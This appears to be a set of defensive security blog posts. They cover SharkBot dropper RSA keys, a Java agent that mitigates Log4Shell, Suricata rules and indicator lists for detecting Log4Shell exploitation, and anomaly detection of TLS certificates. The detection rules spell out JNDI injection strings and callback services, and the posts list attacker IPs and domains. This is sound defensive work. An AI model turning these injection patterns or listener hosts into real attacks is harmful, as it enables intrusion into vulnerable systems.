MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2R7nRj0JMouviqMisFYt0F2QnScoofoR7svCcjrQcTUe7tKKweDnSetdz1A+PLNtk7wKJk+SE3tcVB7KQS/WrdsEaE9CBVJ5YmDpqGaLK9qZhAprWuKdnFU8jZ8KjNh8fXyt8UlcO9ABgiGbuyuzXgyQVbzFfOfEqccSNlIBY3s+LtKkwb2k5GI938X/4SCX3v0r2CKlVU5ZLYYuOUzDLNl6KSToZIx5VSAB3VYp1xYurRLRPb2ncwmunb9sJUTnlwypmBCKcwTxhsFVAEvpz75opuMgv8ba9Hs0Q21PChxu98jNPsgIwUn3xmsMUl0rNgBC3MaPs8nSgcT4oUXaVwIDAQAB

RSA Public Key used to encrypt RC4 Key in the Google Play SharkBotDropper:

MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9qo1QgM8FH7oAkCLkNO5XfQBUdl+pI4u2tvyFiZZ6hMZ07QnlYazgRmWcC5j5H2iV+74gQ9+1cgjnVSszGbIwVJOQAEZGRpSFT7BhAhA4+PTjH6CCkiyZTk7zURvgBCrXz6+B1XH0OcD4YUYs4OGj8Pd2KY6zVocmvcczkwiU1LEDXo3PxPbwOTpgJL+ySWUgnKcZIBffTiKZkry0xR8vD/d7dVHmZnhJS56UNefegm4aokHPmvzD9p9n3ez1ydzfLJARb5vg0gHcFZMjf6MhuAeihFMUfLLtddgo00Zs4wFay2mPYrpn2x2pYineZEzSvLXbnxuUnkFqNmMV4UJwIDAQAB

log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228

tl;dr Run our new tool by adding -javaagent:log4j-jndi-be-gone-1.0.0-standalone.jar to all of your JVM Java stuff to stop log4j from loading classes remotely over LDAP. This will prevent malicious inputs from triggering the “Log4Shell” vulnerability and gaining remote code execution on your systems.

In this post, we first offer some context on the vulnerability, the released fixes (and their shortcomings), and finally our mitigation (or you can skip directly to our mitigation tool here).

Context: log4shell

Hello internet, it’s been a rough week. As you have probably learned, basically every Java app in the world uses a library called “log4j” to handle logging, and that any string passed into those logging calls will evaluate magic ${jndi:ldap://...} sequences to remotely load (malicious) Java class files over the internet (CVE-2021-44228, “Log4Shell”). Right now, while the SREs are trying to apply the not-quite-a-fix official fix and/or implement egress filtering without knocking their employers off the internet, most people are either blaming log4j for even having this JNDI stuff in the first place and/or blaming the issue on a lack of support for the project that would have helped to prevent such a dangerous behavior from being so accessible. In reality, the JNDI stuff is regrettably more of an “enterprise” feature than one that developers would just randomly put in if left to their own devices. Enterprise Java is all about antipatterns that invoke code in roundabout ways to the point of obfuscation, and supporting ever more dynamic ways to integrate weird protocols like RMI to load and invoke remote code dynamically in weird ways. Even the log4j format “Interpolator” wraps a bunch of handlers, including the JNDI handler, in reflection wrappers. So, if anything, more “(financial) support” for the project would probably just lead to more of these kinds of things happening as demand for one-off formatters for new systems grows among larger users. Welcome to Enterprise Java Land, where they’ve already added log4j variable expansion for Docker and Kubernetes. Alas, the real problem is that log4j 2.x (the version basically everyone uses) is designed in such a way that all string arguments after the main format string for the logging call are also treated as format strings. Basically all log4j calls are equivalent to if the following C:

printf("%s\n", "clobbering some bytes %n");

were implemented as the very unsafe code below:

char *buf;
asprintf(&buf, "%s\n", "clobbering some bytes %n");
printf(buf);

Basically, log4j never got the memo about format string vulnerabilities and now it’s (probably) too late. It was only a matter of time until someone realized they exposed a magic format string directive that led to code execution (and even without the classloading part, it is still a means of leaking expanded variables out through other JNDI-compatible services, like DNS), and I think it may only be a matter of time until another dangerous format string handler gets introduced into log4j. Meanwhile, even without JNDI, if someone has access to your log4j output (wherever you send it), and can cause their input to end up in a log4j call (pretty much a given based on the current havoc playing out) they can systematically dump all sorts of process and system state into it including sensitive application secrets and credentials. Had log4j not implemented their formatting this way, then the JNDI issue would only impact applications that concatenated user input into the format string (a non-zero amount, but much less than 100%).

The “Fixes”

The main fix is to update to the just released log4j 2.16.0. Prior to that, the official mitigation from the log4j maintainers was:

“In releases >=2.10, this behavior can be mitigated by setting either the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true. For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class.”

Apache Log4j

So to be clear, the fix given for older versions of log4j (2.0-beta9 until 2.10.0) is to find and purge the JNDI handling class from all of your JARs, which are probably all-in-one fat JARs because no one uses classpaths anymore, all to prevent it from being loaded.

A tool to mitigate Log4Shell by disabling log4j JNDI

To try to make the situation a little bit more manageable in the meantime, we are releasing log4j-jndi-be-gone, a dead simple Java agent that disables the log4j JNDI handler outright. log4j-jndi-be-gone uses the Byte Buddy bytecode manipulation library to modify the at-issue log4j class’s method code and short circuit the JNDI interpolation handler. It works by effectively hooking the at-issue JndiLookup class’ lookup() method that Log4Shell exploits to load remote code, and forces it to stop early without actually loading the Log4Shell payload URL. It also supports Java 6 through 17, covering older versions of log4j that support Java 6 (2.0-2.3) and 7 (2.4-2.12.1), and works on read-only filesystems (once installed or mounted) such as in read-only containers.

The benefit of this Java agent is that a single command line flag can negate the vulnerability regardless of which version of log4j is in use, so long as it isn’t obfuscated (e.g. with proguard), in which case you may not be in a good position to update it anyway. log4j-jndi-be-gone is not a replacement for the -Dlog4j2.formatMsgNoLookups=true system property in supported versions, but helps to deal with those older versions that don’t support it.

Using it is pretty simple, just add -javaagent:path/to/log4j-jndi-be-gone-1.0.0-standalone.jar to your Java commands. In addition to disabling the JNDI handling, it also prints a message indicating that a log4j JNDI attempt was made with a simple sanitization applied to the URL string to prevent it from becoming a propagation vector. It also “resolves” any JNDI format strings to "(log4j jndi disabled)" making the attempts a bit more grep-able.

$ java -javaagent:log4j-jndi-be-gone-1.0.0.jar -jar myapp.jar

log4j-jndi-be-gone is available from our GitHub repo, https://github.com/nccgroup/log4j-jndi-be-gone. You can grab a pre-compiled log4j-jndi-be-gone agent JAR from the releases page, or build one yourself with ./gradlew, assuming you have a recent version of Java installed.

Log4Shell: Reconnaissance and post exploitation network detection

Note: This blogpost will be live-updated with new information. NCC Group’s RIFT is intending to publish PCAPs of different exploitation methods in the near future – last updated December 14th at 13:00 UTC

About the Research and Intelligence Fusion Team (RIFT): RIFT leverages our strategic analysis, data science, and threat hunting capabilities to create actionable threat intelligence, ranging from IOCs and detection capabilities to strategic reports on tomorrow’s threat landscape. Cyber security is an arms race where both attackers and defenders continually update and improve their tools and ways of working. To ensure that our managed services remain effective against the latest threats, NCC Group operates a Global Fusion Center with Fox-IT at its core. This multidisciplinary team converts our leading cyber threat intelligence into powerful detection strategies.

In the wake of the CVE-2021-44228 (a.k.a. Log4Shell) vulnerability publication, NCC Group’s RIFT immediately started investigating the vulnerability in order to improve detection and response capabilities mitigating the threat. This blog post is focused on detection and threat hunting, although attack surface scanning and identification are also quintessential parts of a holistic response. Multiple references for prevention and mitigation can be found included at the end of this post.

This blogpost provides Suricata network detection rules that can be used not only to detect exploitation attempts, but also indications of successful exploitation. In addition, a list of indicators of compromise (IOC’s) are provided. These IOC’s have been observed listening for incoming connections and are thus a useful for threat hunting.

Update Wednesday December 15th, 17:30 UTC

We have seen 5 instances in our client base of active exploitation of Mobile Iron during the course of yesterday and today.

Our working hypothesis is that this is a derivative of the details shared yesterday – https://github.com/rwincey/CVE-2021-44228-Log4j-Payloads/blob/main/MobileIron.

The scale of the exposure globally appears significant.

We recommend all Mobile Iron users updated immediately.

Ivanti informed us that communication was sent over the weekend to MobileIron Core customers. Ivanti has provided mitigation steps of the exploit listed below on their Knowledge Base. Both NCC Group and Ivanti recommend all customers immediately apply the mitigation within to ensure their environment is protected.

Update Tuesday December 14th, 13:00 UTC

Log4j-finder: finding vulnerable versions of Log4j on your systems

RIFT has published a Python 3 script that can be run on endpoints to check for the presence of vulnerable versions of Log4j. The script requires no dependencies and supports recursively checking the filesystem and inside JAR files to see if they contain a vulnerable version of Log4j. This script can be of great value in determining which systems are vulnerable, and where this vulnerability stems from. The script will be kept up to date with ongoing developments.

It is strongly recommended to run host based scans for vulnerable Log4j versions. Whereas network-based scans attempt to identify vulnerable Log4j versions by attacking common entry points, a host-based scan can find Log4j in unexpected or previously unknown places.

The script can be found on GitHub: https://github.com/fox-it/log4j-finder

JNDI ExploitKit exposes larger attack surface

As shown by the release of an update JNDI ExploitKIT  it is possible to reach remote code execution through serialized payloads instead of referencing a Java .class object in LDAP and subsequently serving that to the vulnerable system. While TrustURLCodebase defaults to false in newer Java versions (6u211, 7u201, 8u191, and 11.0.1) and therefore prevents the LDAP reference vector,depending on the loaded libraries in the vulnerable application it is possible to execute code through Java serialization via both rmi and ldap.

Beware: Centralized logging can result in indirect compromise

This is also highly relevant for organisations using a form of centralised logging. Centralised logging can be used to collect and parse the received logs from the different services and applications running in the environment. We have identified cases where a Kibana server was not exposed to the Internet but because it received logs from several appliances it still got hit by the Log4Shell RCE and started to retrieve Java objects via LDAP.

We were unable to determine if this was due to Logstash being used in the background for parsing the received logs, but this stipulates the importance of checking systems configured with centralised logging solutions for vulnerable versions of Log4j, and not rely on the protection of newer JDK versions that has com.sun.jndi.ldap.object.trustURLCodebase
com.sun.jndi.rmi.object.trustURLCodebase set to false by default.

A warning concerning possible post-exploitation

Although largely eclipsed by Log4Shell, last weekend also saw the emergence of details concerning two vulnerabilities (CVE-2021-42287 and CVE-2021-42278) that reside in the Active Directory component of Microsoft Windows Server editions. Due to the nature of these vulnerabilities, an attackers could escalate their privileges in a relatively easy manner as these vulnerabilities have already been weaponised.

It is therefore advised to apply the patches provided by Microsoft in the November 2021 security updates to every domain controller that is residing in the network as it is a possible form of post-exploitation after Log4Shell were to be successfully exploited.

Background

Since Log4J is used by many solutions there are significant challenges in finding vulnerable systems and any potential compromise resulting from exploitation of the vulnerability. JNDI (Java Naming and Directory Interface™) was designed to allow distributed applications to look up services in a resource-independent manner, and this is exactly where the bug resulting in exploitation resides. The nature of JNDI allows for defense-evading exploitation attempts that are harder to detect through signatures. An additional problem is the tremendous amount of scanning activity that is currently ongoing. Because of this, investigating every single exploitation attempt is in most situations unfeasible. This means that distinguishing scanning attempts from actual successful exploitation is crucial.

In order to provide detection coverage for CVE-2021-44228, NCC Group’s RIFT first created a ruleset that covers as many as possible ways of attempted exploitation of the vulnerability. This initial coverage allowed the collection of Threat Intelligence for further investigation. Most adversaries appear to use a different IP to scan for the vulnerability than they do for listening for incoming victim machines. IOC’s for listening IP’s / domains are more valuable than those of scanning IP’s. After all a connection from an environment to a known listening IP might indicate a successful compromise, whereas a connection to a scanning IP might merely mean that it has been scanned.

After establishing this initial coverage, our focus shifted to detecting successful exploitation in real time. This can be done by monitoring for rogue JRMI or LDAP requests to external servers. Preferably, this sort of behavior is detected in a port-agnostic way as attackers may choose arbitrary ports to listen on. Moreover, currently a full RCE chain requires the victim machine to retrieve a Java class file from a remote server (caveat: unless exfiltrating sensitive environment variables). For hunting purposes we are able to hunt for inbound Java classes. However, if coverage exists for incoming attacks we are also able to alert on an inbound Java class in a short period of time after an exploitation attempt. The combination of inbound exploitation attempt and inbound Java class is a high confidence IOC that a successful connection has occurred.

This blogpost will continue twofold: we will first provide a set of suricata rules that can be used for:

  1. Detecting incoming exploitation attempts;
  2. Alerting on higher confidence indicators that successful exploitation has occurred;
  3. Generating alerts that can be used for hunting

After providing these detection rules, a list of IOC’s is provided.

Detection Rules

Some of these rules are redundant, as they’ve been written in rapid succession.

# Detects Log4j exploitation attempts
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:ldap://"; fast_pattern:only; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003726; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; pcre:"/\$\{jndi\:(rmi|ldaps|dns)\:/"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003728; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (CVE-2021-44228)"; flow:established, to_server; content:"${jndi:"; fast_pattern; content:!"ldap://"; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, twitter.com/stereotype32/status/1469313856229228544; metadata:CVE 2021-44228; metadata:created_at 2021-12-10; metadata:ids suricata; sid:21003730; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Defense-Evasive Apache Log4J RCE Request Observed (URL encoded bracket) (CVE-2021-44228)"; flow:established, to_server; content:"%7bjndi:"; nocase; fast_pattern; flowbits:set, fox.apachelog4j.rce; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; priority:3; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003731; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header"; flow:established, to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003732; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI"; flow:established,to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; flowbits:set, fox.apachelog4j.rce.loose; classtype:web-application-attack; priority:3; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url, http://www.lunasec.io/docs/blog/log4j-zero-day/; reference:url, https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; sid:21003733; rev:1;)
# Better and stricter rules, also detects evasion techniques
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in HTTP Header (strict)"; flow:established,to_server; content:"${"; http_header; fast_pattern; content:"}"; http_header; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Hi; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:web-application-attack; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003734; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in URI (strict)"; flow:established, to_server; content:"${"; http_uri; fast_pattern; content:"}"; http_uri; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Ui; xbits:set, fox.log4shell.attempt, track ip_dst, expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-11; metadata:ids suricata; priority:3; sid:21003735; rev:1;)
alert http any any -> $HOME_NET any (msg:"FOX-SRT – Exploit – Possible Apache Log4j Exploit Attempt in Client Body (strict)"; flow:to_server; content:"${"; http_client_body; fast_pattern; content:"}"; http_client_body; distance:0; pcre:/(\$\{\w+:.*\}|jndi)/Pi; flowbits:set, fox.apachelog4j.rce.strict; xbits:set,fox.log4shell.attempt,track ip_dst,expire 1; classtype:web-application-attack; threshold:type limit, track by_dst, count 1, seconds 3600; reference:url,www.lunasec.io/docs/blog/log4j-zero-day/; reference:url,https://twitter.com/testanull/status/1469549425521348609; metadata:CVE 2021-44228; metadata:created_at 2021-12-12; metadata:ids suricata; priority:3; sid:21003744; rev:1;)

Detecting outbound connections to probing services

Connections to outbound probing services could indicate a system in your network has been scanned and subsequently connected back to a listening service. This could indicate that a system in your network is/was vulnerable and has been scanned.

# Possible successful interactsh probe
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"FOX-SRT – Webattack – Possible successful InteractSh probe observed"; flow:established, to_client; content:"200"; http_stat_code; content:"<html><head></head><body>"; http_server_body; fast_pattern; pcre:"/[a-z0-9]{30,36}<\/body><\/html>/QR"; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:misc-attack; reference:url, github.com/projectdiscovery/interactsh; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003712; rev:1;)
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – DNS query for interactsh.com server observed"; flow:stateless; dns_query; content:".interactsh.com"; fast_pattern; pcre:"/[a-z0-9]{30,36}\.interactsh\.com/"; threshold:type limit, track by_src, count 1, seconds 3600; reference:url, github.com/projectdiscovery/interactsh; classtype:bad-unknown; metadata:created_at 2021-12-05; metadata:ids suricata; priority:2; sid:21003713; rev:1;)
# Detecting DNS queries for dnslog[.]cn
alert dns any any -> any 53 (msg:"FOX-SRT – Suspicious – dnslog.cn DNS Query Observed"; flow:stateless; dns_query; content:"dnslog.cn"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-12-10; metadata:ids suricata; priority:2; sid:21003729; rev:1;)
# Connections to requestbin.net
alert dns $HOME_NET any -> any 53 (msg:"FOX-SRT – Suspicious – requestbin.net DNS Query Observed"; flow:stateless; dns_query; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003685; rev:1;)
alert tls $HOME_NET any -> $EXTERNAL_NET 443 (msg:"FOX-SRT – Suspicious – requestbin.net in SNI Observed"; flow:established, to_server; tls_sni; content:"requestbin.net"; fast_pattern:only; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; metadata:created_at 2021-11-23; metadata:ids suricata; sid:21003686; rev:1;)

Detecting possible successful exploitation

Outbound LDAP(S) / RMI connections are highly uncommon but can be caused by successful exploitation. Inbound Java can be suspicious, especially if it is shortly after an exploitation attempt.

# Detects possible successful exploitation of Log4j
# JNDI LDAP/RMI Request to External
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JNDI LDAP Bind to External Observed (CVE-2021-44228)"; flow:established, to_server; dsize:14; content:"|02 01 03 04 00 80 00|"; offset:7; isdataat:!1, relative; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; metadata:created_at 2021-12-11; sid:21003738; rev:2;)
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Exploit – Possible Rogue JRMI Request to External Observed (CVE-2021-44228)"; flow:established, to_server; content:"JRMI"; depth:4; threshold:type limit, track by_src, count 1, seconds 3600; classtype:bad-unknown; priority:1; reference:url, https://docs.oracle.com/javase/9/docs/specs/rmi/protocol.html; metadata:created_at 2021-12-11; sid:21003739; rev:1;)
# Detecting inbound java shortly after exploitation attempt
alert tcp any any -> $HOME_NET any (msg: "FOX-SRT – Exploit – Java class inbound after CVE-2021-44228 exploit attempt (xbit)"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:40; fast_pattern; xbits:isset, fox.log4shell.attempt, track ip_dst; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:successful-user; priority:1; metadata:ids suricata; metadata:created_at 2021-12-12; sid:21003741; rev:1;)

Hunting rules (can yield false positives)

Wget and cURL to external hosts was observed to be used by an actor for post-exploitation. As cURL and Wget are also used legitimately, these rules should be used for hunting purposes. Also note that attackers can easily change the User-Agent but we have not seen that in the wild yet. Outgoing connections after Log4j exploitation attempts can be tracked to be later hunted on although this rule can generate false positives if victim machine makes outgoing connections regularly. Lastly, detecting inbound compiled Java classes can also be used for hunting.

# Outgoing connection after Log4j Exploit Attempt (uses xbit from sid: 21003734) – requires `stream.inline=yes` setting in suricata.yaml for this to work
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FOX-SRT – Suspicious – Possible outgoing connection after Log4j Exploit Attempt"; flow:established, to_server; xbits:isset, fox.log4shell.attempt, track ip_src; stream_size:client, =, 1; stream_size:server, =, 1; threshold:type limit, track by_dst, count 1, seconds 3600; classtype:bad-unknown; metadata:ids suricata; metadata:created_at 2021-12-12; priority:3; sid:21003740; rev:1;)
# Detects inbound Java class
alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg: "FOX-SRT – Suspicious – Java class inbound"; flow:established, to_client; content: "|CA FE BA BE 00 00 00|"; depth:20; fast_pattern; threshold:type limit, track by_dst, count 1, seconds 43200; metadata:ids suricata; metadata:created_at 2021-12-12; classtype:bad-unknown; priority:3; sid:21003742; rev:2;)

Indicators of Compromise

This list contains Domains and IP’s that have been observed to listen for incoming connections. Unfortunately, some adversaries scan and listen from the same IP, generating a lot of noise that can make threat hunting more difficult. Moreover, as security researchers are scanning the internet for the vulnerability as well, it could be possible that an IP or domain is listed here even though it is only listening for benign purposes.

# IP addresses and domains that have been observed in Log4j exploit attempts
134[.]209[.]26[.]39
199[.]217[.]117[.]92
pwn[.]af
188[.]120[.]246[.]215
kryptoslogic-cve-2021-44228[.]com
nijat[.]space
45[.]33[.]47[.]240
31[.]6[.]19[.]41
205[.]185[.]115[.]217
log4j[.]kingudo[.]de
101[.]43[.]40[.]206
psc4fuel[.]com
185[.]162[.]251[.]208
137[.]184[.]61[.]190
162[.]33[.]177[.]73
34[.]125[.]76[.]237
162[.]255[.]202[.]246
5[.]22[.]208[.]77
45[.]155[.]205[.]233
165[.]22[.]213[.]147
172[.]111[.]48[.]30
133[.]130[.]120[.]176
213[.]156[.]18[.]247
m3[.]wtf
poc[.]brzozowski[.]io
206[.]188[.]196[.]219
185[.]250[.]148[.]157
132[.]226[.]170[.]154
flofire[.]de
45[.]130[.]229[.]168
c19s[.]net
194[.]195[.]118[.]221
awsdns-2[.]org
2[.]56[.]57[.]208
158[.]69[.]204[.]95
45[.]130[.]229[.]168
163[.]172[.]157[.]143
45[.]137[.]21[.]9
bingsearchlib[.]com
45[.]83[.]193[.]150
165[.]227[.]93[.]231
yourdns[.]zone[.]here
eg0[.]ru
dataastatistics[.]com
log4j-test[.]xyz
79[.]172[.]214[.]11
152[.]89[.]239[.]12
67[.]205[.]191[.]102
ds[.]Rce[.]ee
38[.]143[.]9[.]76
31[.]191[.]84[.]199
143[.]198[.]237[.]19

# (Ab)use of listener-as-a-service domains.
# These domains can be false positive heavy, especially if these services are used legitimately within your network.
interactsh[.]com
interact[.]sh
burpcollaborator[.]net
requestbin[.]net
dnslog[.]cn
canarytokens[.]com

# This IP is both a listener and a scanner at the same time. Threat hunting for this IOC thus requires additional steps.
45[.]155[.]205[.]233
194[.]151[.]29[.]154
158[.]69[.]204[.]95
47[.]254[.]127[.]78

References

General references

Mitigation:

Attack surface:

Known vulnerable services / products which use log4j:

Hashes of vulnerable products (beware, 2.15 of Log4J is included):

Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm

Author: Margit Hazenbroek

tl;dr

An approach to detecting suspicious TLS certificates using an incremental anomaly detection model is discussed. This model utilizes the Half-Space-Trees algorithm and provides our security operations teams (SOC) with the opportunity to detect suspicious behavior, in real-time, even when network traffic is encrypted. 

The prevalence of encrypted traffic

As a company that provides Managed Network Detection & Response services an increase in the use of encrypted traffic has been observed. This trend is broadly welcome. The use of encrypted network protocols yields improved mitigation against eavesdropping. However, in an attempt to bypass security detection that relies on deep packet inspection, it is now a standard tactic for malicious actors to abuse the privacy that encryption enables. For example, when conducting malicious activity, such as command and control of an infected device, connections to the attacker controlled external domain now commonly occur using HTTPS.

The application of a range of data science techniques is now integral to identifying malicious activity that is conducted using encrypted network protocols. This blogpost expands on one such technique, how anomalous characteristics of TLS certificates can be identified using the Half Space Trees algorithm. In combination with other modelling, like the identification of an unusual JA3 hash [i], beaconing patterns [ii] or randomly generated domains [iii], effective detection logic can be created. The research described here has subsequently been further developed and added to our commercial offering. It is actively facilitating real time detection of malicious activity.

Malicious actors abuse the trust of TLS certificates

TLS certificates are a type of digital certificate, issued by a Certificate Authority (CA) certifying that they have verified the owners of the domain name which is the subject of the certificate. TLS certificates usually contain the following information:

  • The subject domain name
  • The subject organization
  • The name of the issuing CA
  • Additional or alternative subject domain names
  • Issue date
  • Expiry date
  • The public key 
  • The digital signature by the CA [iv]. 

If malicious actors want to use TLS to ensure that they appear as legitimate traffic they have to obtain a TLS certificate (Mitre, T1608.003) [v]. Malicious actors can obtain certificates in different ways, most commonly by: 

  • Obtaining free certificates from a CA. CA’s like Let’s Encrypt issue free certificates. Malicious actors are known to widely abuse this trust relationship (vi, vii). 
  • Creating self-signed certificates. Self-signed certificates are not signed by a CA. Certain attack frameworks such as Cobalt Strike offer the option to generate self-signed certificates.
  • Buying or stealing certificates from a CA. Malicious actors can deceive a CA to issue a certificate for a fake organization.

The following example shows the subject name and issue name of a TLS certificate in a recent Ryuk ransomware campaign.

Subject Name: 
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com

Issuer Name: 
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com 

Example 1. Subject and issuer fields in a TLS certificate used in Ryuk ransomware

The meaning of the attributes that can be found in the issuer name and subject name fields of TLS certificates are defined in RFC 5280 and are explained in the table below.

Attribute
C Country of the entity
S State of province
L Locality
O Organizational name
OU Organizational Unit
CN Common Name
Table 1.  The subject usually includes the information of the owner, and the issuer field includes the entity that has signed and issued the certificate (RFC, 5280) (viii).

Note the following characteristics that can be observed in this malicious certificate:

  • It is a self-signed certificate as no CA present in the Issuer Name. 
  • The Organization names attribute contains the string “lol” 
  • The Organizational Units attribute is empty 
  • A domain name is present in the Common Name (ix, x)

Compare these characteristics to the legitimate certificate used by the fox-it.com domain. 

Subject Name:
C=GB, L=Manchester, O=NCC Group PLC, CN=www.nccgroup.com

Issuer Name:
C=US, O=Entrust, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K

Example 2. Subject and issuer fields in a TLS certificate used by fox-it.com

Observe the attributes in the Subject and Issuer Name. In the Subject Name is information about the owner of the certificate. In the Issuer Name is information of the CA. 

Using machine learning to identify anomalous certificates

When comparing the legitimate and malicious certificate the certificate used in Ryuk ransomware “looks weird”. If humans could identify that the malicious certificate is peculiar, could machines also learn to classify such a certificate as anomalous? To explore this question a dataset of “known good” and “known bad” TLS certificates was curated. Using white-box algorithms, such as Random Forest, several features were identified that helped classify malicious certificates. For example, the number of empty attributes had a statistical relationship with how likely it was used for malicious activities.However, it was soon recognized that such an approach was problematic, there was a risk of “over-fitting” the algorithm to the training data, a situation whereby the algorithm would perform well on the training dataset but perform poorly when applied to real life data. Especially in a stream of data that evolves over time, such as network data, it is challenging to maintain high detection precision. To be effective this model needed the ability to become aware of new patterns that may present themselves outside of the small sample of training data provide; an unsupervised machine learning model which could detect anomalies in real-time was required.  

An isolation-based anomaly detection approach

The Isolation Forest was the first isolation-based anomaly detection model, created by Liu et al. in 2008 (xi). The referenced paper presented an intuitive but powerful idea. Anomalous data points are rare. And a property of rarity is that the anomalous data point must be easier to isolate from the rest of the data. 

From this insight the algorithm proposed computes the ease of isolating an anomaly. It achieves this by making a tree to split the data (visualization 1 includes an example of a tree structure). The more anomalous an observation is the faster an anomaly gets isolated in the tree, and the less splits in the tree are needed. Note, the Isolation Forest is an ensemble method, meaning it builds multiple trees (forest) and calculates the average amounts of splits made by the trees to isolate an anomaly (xi). 

An advantage of this approach is that, in contrast to density and distance-based approaches, less computational cost is required to identify anomalies (xi, xii) whilst maintaining comparable levels of performance metrics (viii, ix).

Half-Space-Trees: Isolation-based approach for streaming data 

In 2011, building on their earlier work, Tan and Liu created an isolation-based algorithm called Half-Space-Trees (HST) that utilized incremental learning techniques. HST enables an isolation-based anomaly detection approach to be applied to a stream of continuous data (xiii). The animation below demonstrates how a simple half-space-tree isolates anomalies in the window space with a tree-based structure: 

Visualization 1:  An example of 2-dimensional data in a window divided by two simple half-space-trees, the visualization is inspired by the original paper.

The HST is also an ensemble method, meaning it builds multiple half-space-trees. A single half-space-tree bisects the window (space) in half-spaces based on the features in the data. Every single half-space-tree does this randomly and goes on as long as the set height of the tree. The half-space-tree calculates the amount of data points per subspace and gives a mass score to that subspace (which is represented by the colors). 

The subspaces where most datapoints fall in are considered high-mass subspaces, and the subspaces with low or no data points are considered low-mass subspaces. Most data points are expected to fall in high-mass subspaces because they need many more splits (i.e., a higher tree) to be isolated. The sum of the mass of all half-space-trees becomes the final anomaly score of the HST (xiii). Calculating mass is a different approach than looking at the number of splits (as conducted in the Isolation Forest). Even so, using recursive methods calculating the mass profile is maintained as a simple and fast way of computing data points in streaming data (xiii). 

